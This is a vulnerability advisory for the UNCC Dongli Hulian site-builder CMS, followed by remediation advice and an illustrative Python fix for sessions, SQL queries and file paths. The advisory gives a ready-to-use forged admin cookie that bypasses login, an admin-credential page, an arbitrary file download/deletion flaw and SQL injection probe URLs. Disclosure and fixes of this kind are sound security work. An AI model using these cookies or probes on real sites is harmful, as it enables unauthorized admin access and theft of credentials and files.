Brief description:
UNCC 動力互聯(lián)建站 (the Dongli Hulian site builder) has several high-risk vulnerabilities that affect essentially every site built with the product.
動力互聯(lián)建站 vulnerability advisory.
(Reporting this as a bundle this time, hoping for an invitation code.)
Detailed description:
Admin panel entry point:
/manage/login.aspx
Forging the cookie is enough to bypass the login: the application treats the client-supplied AdminID and AdminName cookies as proof of authentication, so setting them to the values below (the domain is a placeholder) grants admin access without a password:
[{ "domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminID", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1"},{ "domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminName", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "admin"}]
Dump administrator account credentials (once logged in with the forged cookie):
/manage/admins.aspx
Arbitrary file download / deletion:
Periodical downloads → Add download document. The file path of the entry is not restricted to the download directory, so it can point at any file on the server; deleting the entry also deletes the file it points to, which turns the same feature into arbitrary file deletion.
SQL injection (the ID parameter is concatenated into the query without filtering):
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1
Proof of concept:
Remediation:
Filter and validate all input. Concretely: stop treating the AdminID/AdminName cookies as proof of login and bind the admin session to a server-side or signed token the client cannot forge; pass the ID parameter of EditAdmin.aspx to a parameterized query after checking it is an integer; and restrict the download-document path to files inside the intended download directory, both when serving and when deleting.
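What the three fixes above look like in code, as an added example that is not the vendor's code; the product is ASP.NET, but the checks are shown in Python for illustration. The signing key, the token layout (`adminid:expiry:hmac`), the in-memory admin table and the download root are assumptions.

```python
"""Added example (not the vendor's code): server-side checks that close the
three issues in the report. Key, token layout, table and file root are
assumptions; the admin table is a constructed in-memory stand-in."""
import hashlib
import hmac
import sqlite3
import time
from pathlib import Path
from typing import Optional, Tuple

SERVER_KEY = b"assumed-server-side-secret-rotate-me"  # assumption: never sent to clients


def issue_session(admin_id: int, ttl: int = 3600,
                  now: Optional[float] = None) -> str:
    """Signed, expiring token. A client cannot mint 'AdminID=1' any more:
    changing the id or the expiry invalidates the HMAC."""
    exp = int((now if now is not None else time.time()) + ttl)
    payload = f"{admin_id}:{exp}"
    sig = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}:{sig}"


def verify_session(token: str, now: Optional[float] = None) -> Optional[int]:
    """Return the admin id, or None for a bare value such as '1', a tampered
    token, or an expired one. compare_digest avoids timing leaks."""
    parts = token.split(":")
    if len(parts) != 3:
        return None
    admin_id, exp, sig = parts
    expected = hmac.new(SERVER_KEY, f"{admin_id}:{exp}".encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    if int(exp) < (now if now is not None else time.time()):
        return None
    return int(admin_id)


def open_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the product's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (ID INTEGER PRIMARY KEY, "
                 "AdminName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO admins VALUES (?, ?, ?)",
                     [(1, "admin", "<hash>"), (2, "editor", "<hash>")])
    return conn


def get_admin(conn: sqlite3.Connection, id_param: str) -> Optional[Tuple[int, str]]:
    """EditAdmin.aspx?ID=... done safely: reject anything that is not an
    integer (so ID=1' and ID=1 and 1=1 stop here), then bind the value."""
    if not id_param.isdigit():
        return None
    return conn.execute("SELECT ID, AdminName FROM admins WHERE ID = ?",
                        (int(id_param),)).fetchone()


def resolve_download(root: Path, requested: str) -> Optional[Path]:
    """Only serve or delete files inside the download root: absolute paths
    and ../ traversal resolve outside it and are refused."""
    root = root.resolve()
    target = (root / requested).resolve()
    if target == root or not target.is_relative_to(root):
        return None
    return target


if __name__ == "__main__":
    token = issue_session(1)
    print("valid token ->", verify_session(token))
    print("forged 'AdminID=1' ->", verify_session("1"))
    db = open_demo_db()
    print("ID=1 ->", get_admin(db, "1"))
    print("ID=1 and 1=1 ->", get_admin(db, "1 and 1=1"))
    print(resolve_download(Path("/tmp/downloads"), "../../etc/passwd"))
```

The same three checks apply regardless of language: an unforgeable session, a typed and parameterized lookup, and a path canonicalized and confined to one directory before the file is read or removed.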